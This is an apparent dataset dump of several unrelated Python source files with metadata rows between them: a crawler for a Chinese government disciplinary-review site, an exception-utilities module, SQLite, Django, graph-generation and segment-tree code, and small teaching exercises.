        info.postion = "其他干部,党纪政务处分"
        return info
class SXQtgbZjscCrawler(Crawler.CrawlerInterface):
    """Crawler for the Shaanxi qinfeng.gov.cn section tagged
    "其他干部,执纪审查" (other cadres, disciplinary review).
    """
    def get_num(self):
        # The pager cell holds "current/total"; return the total page count.
        soup = self.get_soup(qtgbZjscIndexUrl)
        a = soup.find("td", id="fanye1948")
        num = a.text
        num = re.findall("[0-9]+/[0-9]*", num)
        num = num[0].split("/")[1]
        return int(num)
    def get_index(self):
        # Entry/index page of this section.
        return qtgbZjscIndexUrl
    def join_url(self, i):
        # URL of the i-th listing page of this section.
        url = baseUrl+"scdc/qtgb/zjsc/"+str(i)+".htm"
        return url
    def get_urls(self, url):
        # Collect absolute article URLs from one listing page.
        soup = self.get_soup(url)
        lists = soup.find("ul", class_="xsxc_index_center_list")
        tags = lists.find_all("a")
        urls = []
        for tag in tags:
            info_url = baseUrl + tag.get('href').replace("../", "")
            urls.append(info_url)
        return urls
    def get_info(self, url):
        # Parse one article page into a Crawler.Info record.
        info_result = Crawler.Info()
        info_result.url = url
        soup = self.get_soup(url)
        title = soup.find("div", class_="article_title")
        info_result.title = title.text
        info_result.time = soup.find("div", class_="article_date").text
        article = soup.find("div", class_="v_news_content")
        ps = article.find_all("p")
        text = ""
        for p in ps:
            text = text + p.text.replace("\t", "") + "\n"
        self.get_resum_description_from_text(text, info_result)
        return info_result
    def process_info(self, info):
        # Strip field labels and tag the record with province and category.
        info.province = "陕西"
        info.source = info.source.replace("来源:", "")
        info.time = info.time.replace("发布时间:", "")
        info.postion = "其他干部,执纪审查"
        return info
# Script entry: crawl the "other cadres / disciplinary review" section and
# persist the results through a shared MySQL connection.
c = SXQtgbZjscCrawler()
# NOTE(review): database credentials are hard-coded; move to configuration.
conns = pymysql.connect(host='127.0.0.1', port=3306, user='root', passwd='123456', db='data', charset='utf8')
c.start(conns)
conns.close()
# print(c.get_num())
# print(c.get_urls("http://www.qinfeng.gov.cn/scdc/sggb/zjsc.htm"))
# c.get_info("http://www.qinfeng.gov.cn/info/1896/76730.htm")
|
[
"[email protected]"
] | |
b5346db185ed928a79136d01fd3e7a44a8ff0b6e
|
b22588340d7925b614a735bbbde1b351ad657ffc
|
/athena/PackDist/share/python/PackDistCommon.py
|
0833847cfd1065059cea672b676003e232021674
|
[] |
no_license
|
rushioda/PIXELVALID_athena
|
90befe12042c1249cbb3655dde1428bb9b9a42ce
|
22df23187ef85e9c3120122c8375ea0e7d8ea440
|
refs/heads/master
| 2020-12-14T22:01:15.365949 | 2020-01-19T03:59:35 | 2020-01-19T03:59:35 | 234,836,993 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,754 |
py
|
"""File: PackDistCommon.py
Common classes and utility functions of the PackDist package.
"""
__author__ = 'Grigori Rybkine <[email protected]>'
__version__ = '0.2.1'
__date__ = 'Wed Oct 03 2012'
__all__ = ['Error', 'InputError', 'CommandError', 'exitstatus']
import sys
import os
class Error(Exception):
    """Base class for exceptions in this module.

    Subclasses carry their details in ``self.args``; ``__str__`` joins
    them with ': ' so messages read naturally.
    """
    def __str__(self):
        return ': '.join(str(arg) for arg in self.args)
    def write(self, file = sys.stderr):
        """Write ``ClassName: message`` to *file* (default: sys.stderr).

        Fixed: the original used the Python 2 statement ``print >> file``,
        which under Python 3 parses as a right-shift expression and raises
        TypeError at runtime instead of printing.
        """
        print('%s: %s' % (self.__class__.__name__, self), file=file)
class InputError(Error):
    """Raised for errors in the input.

    args[0] -- the input expression in which the error occurred
    args[1] -- an explanation of the error
    """
    def __init__(self, expression, message):
        super(InputError, self).__init__(expression, message)
    def expression(self):
        """Return the offending input expression."""
        return self.args[0]
    def message(self):
        """Return the explanation of the error."""
        return self.args[1]
class CommandError(Error):
    """Raised when executing a shell command fails.

    args[0] -- the shell command that was executing
    args[1] -- the command's combined stderr and stdout
    args[2] -- the command's exit status (None if unknown)
    """
    def __init__(self, cmd, output, sc=None):
        super(CommandError, self).__init__(cmd, output, sc)
def exitstatus(status):
    """Return the child's exit code if it terminated normally, else None.

    *status* is encoded process status information as produced by
    os.wait()/os.waitpid(), os.system(), the close() method of a file
    object returned by os.popen(), or commands.getstatusoutput().
    """
    return os.WEXITSTATUS(status) if os.WIFEXITED(status) else None
|
[
"[email protected]"
] | |
8c07ff1f2000187859283c0c13239c2b31bec23c
|
abd668ceb1736c029f3527561bea9995876025a0
|
/run.py
|
206c205905007d3d9d887ebc731993f08316348e
|
[] |
no_license
|
choltz95/simulated_annealing_pcb
|
7eb2554893b64bd57323ec95d1b583ff663dae31
|
da5b81b2d591b70f2051419d7f7b5b353feb4847
|
refs/heads/master
| 2020-04-23T22:13:27.608394 | 2019-04-15T18:25:44 | 2019-04-15T18:25:44 | 171,494,586 | 2 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 63 |
py
|
import pyximport; pyximport.install(pyimport=True)
import main
|
[
"[email protected]"
] | |
6f76c3e90edcaf9c1f2baf7fdfa020386a48cffd
|
828e48fdf39d9703ad40adf4b6830f6ccabafc46
|
/primarykeyid.py
|
0f8be37f05e39e0af96ff40e6037285fa4b43b0e
|
[] |
no_license
|
NitinKumarGehlot/Python-SQLite3
|
78f0b3010fff0ee049bb47ea74babd3ec51742f0
|
6cf0fa7162a31686e05de5c1cf89128412036302
|
refs/heads/master
| 2023-06-03T15:19:21.830210 | 2021-06-19T21:17:06 | 2021-06-19T21:17:06 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 340 |
py
|
# Dump every row of the `customers` table (with its rowid) from customer.db.
import sqlite3
# conn=sqlite3.connect(":memory:")
conn=sqlite3.connect("customer.db")
#create cursor
c=conn.cursor()
#query the database; rowid is sqlite's implicit integer primary key
c.execute("SELECT rowid, * FROM customers")
# print(c.fetchone())
# c.fetchmany(3)
items=c.fetchall()
for i in items:
    print(i)
#commit our command (NOTE(review): a no-op here — SELECT changes nothing)
conn.commit()
#close connection
conn.close()
|
[
"[email protected]"
] | |
81ea1ab2df818a7bab3de630e81d3f329599e6bf
|
e9b06426f553b7c1d3550a0932e60756e82c3f78
|
/Lab0/python_basics/shop.py
|
d48f8f01de1cadc4d63ee5f056e0d058d85567bf
|
[
"MIT"
] |
permissive
|
MaAlonsoA/AI-Class
|
a5af9b2e1a2dd76f377e04f4f2f0a784802f12a8
|
7fa679b69b699e86dfc99548620c62a37f3d8e57
|
refs/heads/master
| 2023-04-14T22:54:52.130742 | 2021-04-24T17:23:52 | 2021-04-24T17:23:52 | 346,392,810 | 0 | 0 |
MIT
| 2021-04-24T17:23:53 | 2021-03-10T14:59:31 |
Python
|
UTF-8
|
Python
| false | false | 1,328 |
py
|
class FruitShop:
    """A fruit shop with a name and a per-pound price list."""

    def __init__(self, name, fruitPrices):
        """
        name: shop name
        fruitPrices: dict mapping fruit name -> price per pound, e.g.
            {'apples': 2.00, 'oranges': 1.50, 'pears': 1.75}
        """
        self.name = name
        self.fruitPrices = fruitPrices
        print('Welcome to %s fruit shop' % (name))

    def getCostPerPound(self, fruit):
        """Return the per-pound cost of *fruit*, or None if not stocked."""
        if fruit not in self.fruitPrices:
            print("Sorry we don't have %s" % (fruit))
            return None
        return self.fruitPrices[fruit]

    def getPriceOfOrder(self, orderList):
        """Return the total cost of a list of (fruit, numPounds) tuples.

        Fruits not in stock contribute nothing to the total.
        """
        total = 0.0
        for fruit, pounds in orderList:
            unit_cost = self.getCostPerPound(fruit)
            if unit_cost is not None:
                total += pounds * unit_cost
        return total

    def getName(self):
        return self.name

    def __str__(self):
        return "<FruitShop: %s>" % self.getName()
|
[
"[email protected]"
] | |
b9b570d9546dee4ed6c0aab0c564c821e5c618b8
|
82bd360b0f58171b003957f3e2584bb51817d766
|
/lab03/lab03.py
|
e1b9c9e701af2c8371b9e1c7300021cdacf1be4f
|
[] |
no_license
|
kenwan006/cs61a
|
2ff00ec0a42f9478f60fe98b70af1b5ae2b8a66b
|
75aab1f348244d41cfb75a9ec1ebb24f81057a05
|
refs/heads/master
| 2020-06-27T16:30:09.573537 | 2019-09-14T23:16:57 | 2019-09-14T23:16:57 | 199,213,384 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,070 |
py
|
def ab_plus_c(a, b, c):
    """Compute a * b + c by repeated addition (recursive).

    >>> ab_plus_c(2, 4, 3)  # 2 * 4 + 3
    11
    >>> ab_plus_c(0, 3, 2)  # 0 * 3 + 2
    2
    >>> ab_plus_c(3, 0, 2)  # 3 * 0 + 2
    2
    """
    # Base case: a * 0 + c == c; otherwise peel one addition of `a` off.
    return c if b == 0 else a + ab_plus_c(a, b - 1, c)
def gcd(a, b):
    """Return the greatest common divisor of a and b (Euclid, recursive).

    >>> gcd(34, 19)
    1
    >>> gcd(39, 91)
    13
    >>> gcd(20, 30)
    10
    >>> gcd(40, 40)
    40
    """
    # Order the pair so we always divide the larger by the smaller.
    big, small = (a, b) if a >= b else (b, a)
    remainder = big % small
    return small if remainder == 0 else gcd(small, remainder)
def hailstone(n):
    """Print the hailstone (Collatz) sequence starting at n and return
    the number of elements in the sequence.

    >>> a = hailstone(10)
    10
    5
    16
    8
    4
    2
    1
    >>> a
    7
    """
    print(n)
    if n == 1:
        return 1
    # Halve even values; triple-plus-one odd values.
    successor = n // 2 if n % 2 == 0 else 3 * n + 1
    return 1 + hailstone(successor)
|
[
"[email protected]"
] | |
8fd82a02b96ef6922c7ccd498e793df6876f3f49
|
46c2418ecfcf3c7034a267364185208a665be583
|
/edb/tools/docs/cli.py
|
2c9295564c14536c42a30b9de2055cc410bdcb02
|
[
"LicenseRef-scancode-unknown-license-reference",
"Apache-2.0"
] |
permissive
|
jankeromnes/edgedb
|
3434549fb0731632ed7adb7fcb329480dee50d91
|
40ea3317fe5bfec76d7b46f7b706a4cb8a0d9f94
|
refs/heads/master
| 2022-02-24T04:56:19.238048 | 2019-05-10T12:24:40 | 2019-06-17T10:29:09 | 185,984,093 | 0 | 0 |
Apache-2.0
| 2022-01-28T09:00:32 | 2019-05-10T12:24:55 |
Python
|
UTF-8
|
Python
| false | false | 1,466 |
py
|
#
# This source file is part of the EdgeDB open source project.
#
# Copyright 2018-present MagicStack Inc. and the EdgeDB authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from edb.edgeql.pygments import EdgeQLLexer
from sphinx import domains as s_domains
from sphinx.directives import code as s_code
from . import shared
class CLISynopsisDirective(s_code.CodeBlock):
    """``.. cli:synopsis::`` — a code-block hard-wired to the
    'cli-synopsis' lexer, taking no arguments or options."""
    has_content = True
    optional_arguments = 0
    required_arguments = 0
    option_spec = {}
    def run(self):
        # Force the highlight language, then defer to CodeBlock.
        self.arguments = ['cli-synopsis']
        return super().run()
class CLIDomain(s_domains.Domain):
    """Sphinx domain providing the ``cli:*`` directives."""
    name = "cli"
    label = "Command Line Interface"
    directives = {
        'synopsis': CLISynopsisDirective,
    }
def setup_domain(app):
    """Register the CLI lexers, inline role and domain with the Sphinx app."""
    app.add_lexer("cli", EdgeQLLexer())
    app.add_lexer("cli-synopsis", EdgeQLLexer())
    app.add_role(
        'cli:synopsis',
        shared.InlineCodeRole('cli-synopsis'))
    app.add_domain(CLIDomain)
|
[
"[email protected]"
] | |
43a228606e02826830759f5f40418f92e634af34
|
19892b65355f7661cf5e42d2f749904788c1a7d0
|
/dailyfresh/daily_fresh/utils/mixin.py
|
6174e5aba8081e3b2cf0368084ea7f0853225db5
|
[] |
no_license
|
BinXiaoEr/daily_fresh
|
35902cb6753851a14517265db3738a008610c7d8
|
d8bdc10e80b6b8e2be5f85f6a8293fb1f4695e1d
|
refs/heads/master
| 2021-07-09T16:06:34.809134 | 2020-08-04T01:51:34 | 2020-08-04T01:51:34 | 181,276,905 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 287 |
py
|
from django.contrib.auth.decorators import login_required
class LoginRequiredMixin(object):
    """Mixin that wraps a class-based view's entry point with Django's
    ``login_required`` decorator, so anonymous users are redirected to
    the login page."""
    @classmethod
    def as_view(cls, **initkwargs):
        # Build the view via the parent class's as_view, then guard it.
        view = super(LoginRequiredMixin, cls).as_view(**initkwargs)
        return login_required(view)
|
[
"[email protected]"
] | |
7321ac8c981ab9abb728e9c05fe1a2576ef0d878
|
3c327aa333bbeafacb8d5bd253814776ffcd0012
|
/df_user/urls.py
|
bf6fcb54488289e42e7484712a3e096f56b612be
|
[] |
no_license
|
1635848644/shopping
|
c5d0a1dd2eb5716ece76045d6c2c261ca0f4db18
|
d820e828eeed3911ea7741e4f11f4c6d83e993c6
|
refs/heads/master
| 2023-04-07T20:12:30.382805 | 2018-10-05T15:08:40 | 2018-10-05T15:08:40 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 405 |
py
|
#coding=utf-8
from django.conf.urls import url
from df_user import views
# URL routes for the df_user app: registration, session handling,
# shipping-address creation, and the three user-center pages.
urlpatterns=[
    url('register/',views.register),
    url('login/',views.login),
    url('logout/',views.logout),
    url('addHarvsetAddress/',views.addHarvsetAddress),
    url('user_center_info/',views.user_center_info),
    url('user_center_order/',views.user_center_order),
    url('user_center_site/',views.user_center_site),
]
|
[
"[email protected]"
] | |
f06180583df93797fbb6c3808e675c48fa3eb210
|
d4c9847a52d9107d64c61c52f990858177136d9f
|
/assignment-6/network.py
|
2761fc023baf5a17d4bf7fb9165d8958c0c4c375
|
[] |
no_license
|
MirunaSeme/Simulation-Methods
|
bc3fa0390a7e9197d31a11116f73358c624b4b28
|
c683472b15dfec30d2752a417926cae4a105649c
|
refs/heads/master
| 2021-09-04T19:13:59.923713 | 2018-01-21T15:43:24 | 2018-01-21T15:43:24 | 112,596,937 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 6,422 |
py
|
import numpy as np
from numpy.random import random
class Network:
    """
    Abstract a network graph.
    """
    @staticmethod
    def AlbertBarabasi(n, directed=False, initial_graph=None):
        """Grow a preferential-attachment (Albert–Barabási) graph of n nodes."""
        if initial_graph is None:
            # The bootstrap graph should have a minimum of 2 connected nodes
            g = Network.FullyConnected(2, directed, allow_diagonals=False)
            first_node_ix = 2
        else:
            g = initial_graph
            # NOTE(review): n is re-based here but the loop below still runs
            # range(first_node_ix, n); with an initial graph this generates
            # fewer nodes than requested — verify the intended bound.
            n = n - g._n
            first_node_ix = g._n
        if n <= 0:
            return g
        """
        Starting from some initial graph, we add nodes that will connect to any other node with probability
        proportional to the indegree (or degree) of that node. Thus, diagonal-friendliness does not makes sense in
        this scenario. We also don't really care about whether the graph is directed or not since the underlying
        graph data structure will take care of this.
        """
        # The main node generator loop
        for node_ix in range(first_node_ix, n):
            # Gather indegrees and normalize them into the target node probability.
            indegrees = g.indegrees()
            target_probabilities = indegrees / np.sum(indegrees)
            # Sample n-1 random numbers and decide whether to add a link to those nodes or not.
            r = np.random.random(target_probabilities.shape)
            edge_decision = r < target_probabilities
            # Add the node and the edges.
            g.add_node()
            for target, add_flag in enumerate(edge_decision):
                if add_flag:
                    g.add_edge(node_ix, target)
        return g
    @staticmethod
    def WattsStrogatz(n, k, beta, directed=False):
        """Watts–Strogatz small-world rewiring of a ring lattice.

        NOTE(review): this method builds and rewires a local copy of the
        adjacency matrix but never assigns it back or returns a graph —
        it falls off the end and returns None.
        """
        def rewire(adj, i, j):
            # NOTE(review): np.where(...) returns a tuple of index arrays,
            # so possible_links is a list of arrays (and `ix != i` compares
            # an array to an int) — this rewiring looks broken; verify.
            possible_links = [ix for ix in np.where(adj[i] == 0) if ix != i]
            link = np.random.choice(possible_links, size=1)
            adj[i,j] = adj[j,i] = 0
            adj[i,link] = adj[link,i] = 1
        g = Network.WSRingLattice(n, k)
        adj = g._adj.copy()
        rewire_queue = []
        # Mark each existing upper-triangle edge for rewiring with prob. beta.
        for i in range(n):
            for j in range(i + 1, n):
                if adj[i, j] == 1:
                    # Extract random number
                    if np.random.binomial(1, beta):
                        rewire_queue.append((i, j))
        # Apply rewiring
        for i, j in rewire_queue:
            rewire(adj, i, j)
    @staticmethod
    def ErdosRenyi(n, p, directed=False, allow_diagonals=False):
        """
        Creates a random graph.
        """
        """
        Random edge generation:
        Idea: generate an adjecency mtx with random values between 0 and 1.
        All those over p will be added. We then filter the matrix based on whether options such as directed,
        diagonal-friendly, etc were selected.
        To have a fair sample in the undirected case, we just mirror the upper triangle of the matrix w.r.t main diagonal
        """
        adj = np.random.random(size=(n, n))
        # Adjust for diagonal-friendliness by element-wise multiplying by (1 - identity mtx).
        # This is just swapping the 0s and 1s in the identity matrix (i.e. creating a 0-diagonal mtx).
        if not allow_diagonals:
            adj = adj * (1 - np.eye(n))
        # Adjust for directedness by mirroring the upper triangle of the matrix.
        # np.tril(n, -1) will generate indexes for the upper triangle. We then just copy the lower triangle of
        # the transpose to our original mtx.
        if not directed:
            lower_triangle_ixs = np.tril_indices(n, -1)
            adj[lower_triangle_ixs] = adj.T[lower_triangle_ixs]
        # Filter the mtx based on the probability of the edges.
        adj = (adj < p).astype(dtype=np.int8)
        # We can now safely set the new adjacency matrix.
        g = Network(directed)
        g.set_adj(adj)
        return g
    @staticmethod
    def WSRingLattice(n, k):
        """
        Constructs an undirected ring lattice with n nodes, each connected to k neighbors, k/2 on each side.
        k should be even.
        """
        # NOTE(review): despite the docstring, the graph is created with
        # directed=True; the matrix itself is built symmetrically.
        adj = np.zeros((n, n))
        for i in range(n):
            for j in range(n):
                if 0 < abs(i - j) % (n - 1 - (k // 2)) <= k // 2:
                    adj[i, j] = 1
        g = Network(directed=True)
        g.set_adj(adj)
        return g
    @staticmethod
    def FullyConnected(n, directed=False, allow_diagonals=False):
        """Complete graph on n nodes; self-loops only if allow_diagonals."""
        adj = np.ones(n) * (1 - np.eye(n)) + (allow_diagonals * np.eye(n))
        g = Network(directed)
        g.set_adj(adj)
        return g
    def __init__(self, directed=False):
        # _eta is the growth increment used when the adjacency matrix fills up.
        self._eta = 100
        self._adj = np.zeros(shape=(self._eta, self._eta), dtype=np.int8)
        self._n = 0
        self._directed = directed
    def set_adj(self, adj):
        # Replace the adjacency matrix wholesale; node count follows its size.
        self._adj = adj
        self._n = adj.shape[0]
    # region Analytics
    def degrees(self, kind='any'):
        """Per-node degree vector: 'in' (column sums), 'out' (row sums),
        or 'any' (treated as 'in')."""
        if kind == 'any' or kind == 'in':
            return np.sum(self._adj, axis=0)
        elif kind == 'out':
            return np.sum(self._adj, axis=1)
        else:
            raise ValueError('Wrong degree kind requested: {}'.format(kind))
    def indegrees(self):
        return self.degrees(kind='in')
    def degree_histogram(self, kind='any'):
        # One bin per possible degree value up to the maximum observed.
        degrees = self.degrees(kind)
        return np.histogram(degrees, bins=max(degrees))
    # endregion
    # region Graph manipulation
    def batch_add_node(self, n):
        """Add n nodes one at a time."""
        for _ in range(n):
            self.add_node()
    def add_node(self):
        """Add one isolated node and return its index; grows storage on demand."""
        self._n += 1
        if self._n >= self._node_count():
            self._expand()
        return self._n - 1
    def add_edge(self, i, j):
        """Add edge (i, j); also (j, i) when the graph is undirected."""
        if (i >= self._n) or (j >= self._n) or (i < 0) or (j < 0):
            raise ValueError('Cannot add edge ({}, {})'.format(i, j))
        else:
            self._adj[i, j] = 1
            if not self._directed:
                self._adj[j, i] = 1
    # endregion
    def to_networkx(self):
        """Export the live n-by-n sub-matrix as a networkx graph."""
        sanitized_adj = self._adj[:self._n, :self._n]
        from networkx import from_numpy_matrix
        return from_numpy_matrix(sanitized_adj)
    # region Protected
    def _node_count(self):
        # Capacity (allocated rows), not the logical node count self._n.
        return self._adj.shape[0]
    def _expand(self):
        # Grow the adjacency matrix by _eta rows/columns of zeros.
        self._adj = np.pad(self._adj, ((0, self._eta), (0, self._eta)), mode='constant', constant_values=0)
    # endregion
|
[
"[email protected]"
] | |
8e4baaae320644a77b9d51ae74ea221201759574
|
1825283527f5a479204708feeaf55f4ab6d1290b
|
/leetcode/segmented-tree/leon.py
|
9b86c455efa6252c088d2e4fb3ac6b44b59e8988
|
[] |
no_license
|
frankieliu/problems
|
b82c61d3328ffcc1da2cbc95712563355f5d44b5
|
911c6622448a4be041834bcab25051dd0f9209b2
|
refs/heads/master
| 2023-01-06T14:41:58.044871 | 2019-11-24T03:47:22 | 2019-11-24T03:47:22 | 115,065,956 | 1 | 0 | null | 2023-01-04T07:25:52 | 2017-12-22T02:06:57 |
HTML
|
UTF-8
|
Python
| false | false | 6,843 |
py
|
# https://github.com/yuexihan/leonLPST/blob/master/leonLPST.py
from __future__ import division
from six.moves import xrange
class LPSTree:
    """Lazy-propagation segment tree (LPST) over n elements.

    LPSTree(n[, value=None[, reducef=None[, modulo=None]]]) -> new LPSTree

    Build a new LPSTree with n elements.
    If value is provided, all elements are set to value, otherwise 0.
    The default reduce function is sum; it can also be set to max or min.
    If modulo is provided, the modulo operation is applied automatically
    to every stored aggregate.
    Supports O(log n) range query (get), range assignment (set) and
    range increment (add), via lazily propagated pending operations.
    """
    def __init__(self, n, value=None, reducef=None, modulo=None):
        if n <= 0:
            raise ValueError("n most be greater than 0")
        self.n = n
        # Round the backing array up to the next power of two, then double
        # it so internal nodes and leaves all fit in a heap-style layout
        # (children of node v live at 2*v+1 and 2*v+2).
        size = 1;
        while(size < n):
            size *= 2
        size *= 2
        self.size = size
        self.tree = [None] * size      # aggregate value per tree node
        self.boolset = [False] * size  # node has a pending range-assignment
        self.booladd = [False] * size  # node has a pending range-increment
        self.lazyset = [None] * size   # value of the pending assignment
        self.lazyadd = [None] * size   # value of the pending increment
        self.modulo = modulo
        if not reducef:
            reducef = sum
        # nodef(val, n) = aggregate of a segment holding n copies of val:
        # val*n under sum, val itself under max/min.
        if reducef == sum:
            self.nodef = (lambda val, n: val*n)
        elif reducef == max or reducef == min:
            self.nodef = (lambda val, n: val)
        else:
            raise ValueError("reducef can only be sum, max or min")
        if self.modulo:
            self.reducef = lambda x: reducef(x) % self.modulo
        else:
            self.reducef = reducef
        # NOTE(review): `!= None` — `is not None` is the usual spelling.
        if value != None:
            array = [value] * n
        else:
            array = [0] * n
        def construct(tree, array, sleft, sright, v):
            # Recursively fill node v covering array[sleft:sright).
            if sleft+1 == sright:
                tree[v] = array[sleft]
                return tree[v]
            smid = (sleft + sright) // 2
            tree[v] = self.reducef((construct(tree, array, sleft, smid, 2*v+1),
                                    construct(tree, array, smid, sright, 2*v+2)))
            # if self.modulo:
            #     tree[v] %= self.modulo
            # print tree
            return tree[v]
        construct(self.tree, array, 0, n, 0)
    def __len__(self):
        # Number of leaf elements, not the internal array size.
        return self.n
    def _lazypropagate(self, v, vleft, vright):
        # Push node v's pending assignment/increment down to its children.
        # Must be called before descending into node v, which covers the
        # half-open interval [vleft, vright).
        tree = self.tree
        boolset = self.boolset
        booladd = self.booladd
        lazyset = self.lazyset
        lazyadd = self.lazyadd
        vmid = (vleft + vright) // 2
        # print tree, v, tree[2*v+1], boolset[v], booladd[v]
        if boolset[v]:
            # Pending assignment overwrites everything in the children,
            # including any increments they had pending.
            tree[2*v+1] = self.nodef(lazyset[v], vmid-vleft)
            tree[2*v+2] = self.nodef(lazyset[v], vright-vmid)
            if self.modulo:
                tree[2*v+1] %= self.modulo
                tree[2*v+2] %= self.modulo
            boolset[2*v+1] = boolset[2*v+2] = True
            booladd[2*v+1] = booladd[2*v+2] = False
            lazyset[2*v+1] = lazyset[2*v+2] = lazyset[v]
            boolset[v] = False
        if booladd[v]:
            # Pending increment combines with the children's pending
            # increments (it is applied on top of any assignment above).
            tree[2*v+1] += self.nodef(lazyadd[v], vmid-vleft)
            tree[2*v+2] += self.nodef(lazyadd[v], vright-vmid)
            if self.modulo:
                tree[2*v+1] %= self.modulo
                tree[2*v+2] %= self.modulo
            if booladd[2*v+1]:
                lazyadd[2*v+1] += lazyadd[v]
            else:
                booladd[2*v+1] = True
                lazyadd[2*v+1] = lazyadd[v]
            if booladd[2*v+2]:
                lazyadd[2*v+2] += lazyadd[v]
            else:
                booladd[2*v+2] = True
                lazyadd[2*v+2] = lazyadd[v]
            booladd[v] = False
        # print tree, v, tree[2*v+1]
    def get(self, start, stop):
        """
        LPSTree.get(start, stop) -> value
        You can assume it same as reduce(reducef, tree[start:stop]).
        """
        n = self.n
        if not(start < stop and start >=0 and stop <= n):
            raise IndexError(start, stop)
        tree = self.tree
        boolset = self.boolset
        booladd = self.booladd
        lazyset = self.lazyset
        lazyadd = self.lazyadd
        def _get(sleft, sright, v, vleft, vright):
            # Query [sleft, sright) against node v's range [vleft, vright).
            # print v, start, stop, vleft, vright, tree
            if sleft>=vright or sright <= vleft:
                return
            if sleft<=vleft and sright >= vright:
                # if self.modulo:
                #     tree[v] %= self.modulo
                return tree[v]
            vmid = (vleft + vright) // 2
            self._lazypropagate(v, vleft, vright)
            # print v, start, stop, vleft, vright, tree
            # Children with no overlap return None and are filtered out.
            return self.reducef([x for x in
                                 (_get(sleft, sright, 2*v+1, vleft, vmid),
                                  _get(sleft, sright, 2*v+2, vmid, vright))
                                 if x != None])
        return _get(start, stop, 0, 0, n)
    def set(self, start, stop, value):
        """
        LPSTree.set(start, stop, value)
        Set all elements in [start, stop) to value.
        """
        n = self.n
        if not(start < stop and start >=0 and stop <= n):
            raise IndexError(start, stop)
        tree = self.tree
        boolset = self.boolset
        booladd = self.booladd
        lazyset = self.lazyset
        lazyadd = self.lazyadd
        def _set(sleft, sright, v, vleft, vright, value):
            # print v, start, stop, vleft, vright, value, tree
            if sleft >= vright or sright <= vleft:
                return
            if sleft <= vleft and sright >= vright:
                # Node fully covered: store the aggregate and record the
                # assignment lazily; a pending increment is cancelled.
                tree[v] = self.nodef(value, vright-vleft)
                if self.modulo:
                    tree[v] %= self.modulo
                boolset[v] = True
                booladd[v] = False
                lazyset[v] = value
                # print v, tree, tree[v], tree[v] % self.modulo
                return
            vmid = (vleft + vright) // 2
            self._lazypropagate(v, vleft, vright)
            _set(sleft, sright, 2*v+1, vleft, vmid, value)
            _set(sleft, sright, 2*v+2, vmid, vright, value)
            # Recompute this node from the refreshed children.
            tree[v] = self.reducef((tree[2*v+1], tree[2*v+2]))
            # if self.modulo:
            #     tree[v] %= self.modulo
            # print v, start, stop, vleft, vright, value, tree
        _set(start, stop, 0, 0, n, value)
    def add(self, start, stop, diff):
        """
        LPSTRee.add(start, stop, diff)
        Add diff to all elements in [start, stop).
        """
        n = self.n
        if not(start < stop and start >=0 and stop <= n):
            raise IndexError(start, stop)
        tree = self.tree
        boolset = self.boolset
        booladd = self.booladd
        lazyset = self.lazyset
        lazyadd = self.lazyadd
        def _add(sleft, sright, v, vleft, vright, diff):
            if sleft >= vright or sright <= vleft:
                return
            if sleft <= vleft and sright >= vright:
                # Node fully covered: bump the aggregate and fold the
                # increment into any increment already pending here.
                tree[v] += self.nodef(diff, vright-vleft)
                if self.modulo:
                    tree[v] %= self.modulo
                if booladd[v]:
                    lazyadd[v] += diff
                else:
                    booladd[v] = True
                    lazyadd[v] = diff
                return
            vmid = (vleft + vright) // 2
            self._lazypropagate(v, vleft, vright)
            _add(sleft, sright, 2*v+1, vleft, vmid, diff)
            _add(sleft, sright, 2*v+2, vmid, vright, diff)
            # Recompute this node from the refreshed children.
            tree[v] = self.reducef((tree[2*v+1], tree[2*v+2]))
            # if self.modulo:
            #     tree[v] %= self.modulo
        _add(start, stop, 0, 0, n, diff)
    def __getitem__(self, index):
        # Single-element read as a degenerate range query.
        return self.get(index, index+1)
    def __setitem__(self, index, value):
        # Single-element write as a degenerate range assignment.
        self.set(index, index+1, value)
    def __repr__(self):
        # Materializes every element: O(n log n).
        return repr([self[x] for x in xrange(self.n)])
    def tolist(self):
        """
        LPSTree.tolist() -> a list object
        Return a list containing all the elements in LPSTree.
        """
        return [self[x] for x in xrange(self.n)]
if __name__ == '__main__':
    # Ad-hoc smoke test / demo.
    # NOTE(review): uses Python 2 ``print`` statements, so this module
    # only runs as a script under Python 2 as-is.
    tree = LPSTree(10, reducef=max)
    # tree = LPSTree(10, modulo=2)
    # tree = LPSTree(10)
    print tree.n, tree.size
    print tree.get(0, 10)
    print tree[0], tree[1]
    tree[9] = 20
    print tree
    print tree.get(0, 10)
    tree.set(1,5,5)
    print tree
    tree.add(1, 10, 12)
    print tree
    tree.set(0, 3, 5)
    tree.add(0, 4, 2)
    print tree
    tree.set(0, 10, 0)
    print tree
    tree.add(1, 9, -10)
    print tree
    print tree.get(8, 9)
    tree.set(0, 3, 9)
    print tree
    tree = LPSTree(10, reducef=max)
    print tree
    # tree.set(0, 10, 0)
    # help(tree.set)
    tree.set(1, 9, -10)
    print tree
|
[
"[email protected]"
] | |
8b8ae1ce63eaacc0031ba4341ad0dbf893504805
|
671fae9e18f50db3b147b3087e30f304d832fb97
|
/TMS/accounts/admin.py
|
5c51c9534c829e7974e32b355d2b29d8cf2fea56
|
[] |
no_license
|
shivasupraj/Employee-Time-Management-Application
|
745375dd06e57c35239282dabd011731a483ed52
|
aa2eecad1a4ae6b6621d40ab17954e30a7c4657a
|
refs/heads/master
| 2021-10-03T10:49:33.751181 | 2018-12-03T00:40:28 | 2018-12-03T00:40:28 | 125,914,418 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 193 |
py
|
from django.contrib import admin

from . import models

# Expose the timesheet app's models in the Django admin site.
for model in (models.Profile, models.Project, models.TimeSheet):
    admin.site.register(model)
|
[
"[email protected]"
] | |
b05acce5674d36ac8d553f00d5fe010f2061fbdf
|
